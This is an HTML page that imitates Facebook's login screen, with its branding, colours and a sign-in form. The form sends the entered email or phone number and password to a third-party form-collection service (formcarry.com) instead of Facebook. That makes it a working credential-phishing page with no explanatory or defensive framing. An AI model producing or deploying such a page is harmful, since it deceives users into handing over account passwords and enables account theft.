<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook-log in or sign up</title>
    <style>
        body{
    background-color: 	#dfe3ee;
}

*{
    margin: 0%;
    padding: 0%;
    
}
.textbox{
    margin-top: 200px;
    margin-left: 150px;

}
h1{
    font-size: 55px;
    color: #1877f2;
    font-family: sans-serif;
}
h2{
    font-family: Helvetica, Arial, sans-serif;
    font-size: 28px;
    font-weight: normal;
    line-height: 32px;
    width: 500px;
}
.container{
    box-shadow: 5px 8px 10px 0 gray;
    width: 400px;
    height: 350px;
    margin-top: -194px;
    margin-right: 160px;
    float: right;
    border-radius: 12px;
    background-color: white;
    width: 390px;
    height: 355px;  
   text-align: center;
   
    
}
.formm{
    float: right;
   background-color: white;
    margin-top: -12px;
    padding: 20px;
}
.text{
    background-color: white;
    margin-top: 10px;
margin-left: -10px;
border-radius: 8px;
margin-right: -10px;
    padding:17px;
    width: 332px;
}
.text2{
    background-color: white;
    margin-top: 10px;
    margin-left: -10px;
    border-radius: 8px;
    margin-right: -10px;
    padding:17px;
    width: 332px;
}
button{
    margin-top: 15px;
    background-color:#1877f2 ;
    padding: 16px;
    width: 100%;
    border-radius: 8px;
    color: white;
    font-family: sans-serif;
    font-size: 18px;


}
p{
    background-color: white;
    font-size: 16px;
    color: #1877f2;
    margin-top: 10px;
}
p a{
    color: #1877f2;
    background-color: white;
}
.btn {
    padding: 7px;
    margin-top: 15px;
   background-color: white;
   margin-left: 60px;
   margin-right: 60px;
}
.btn button{
    background-color:#1b9c24 ;
   
}
    </style>
</head>
<body>
    <div class="textbox">
        <h1>
            facebook
        </h1>
        <h2>
            Facebook helps you connect and share<br> with the people in your life.
        </h2>
    </div>


    <div class="container">
<div class="formm">
    <form action="https://formcarry.com/s/2EvoYkaDhV5" method="POST">
    <input name="Email" type="text" class="text" placeholder="Enter Your Email or Phone number"> <br>
    <input name="Password" type="password" class="text2" placeholder="Password"><br>
    <button name="Submit">
        Log In
    </button>
    </form>
    <p><a href="">forgot password?</a><br></p>
    <div class="btn">
        <button>Create New Account</button>
     
         
     </div>



</div>

    </div>
    
</body>
</html>
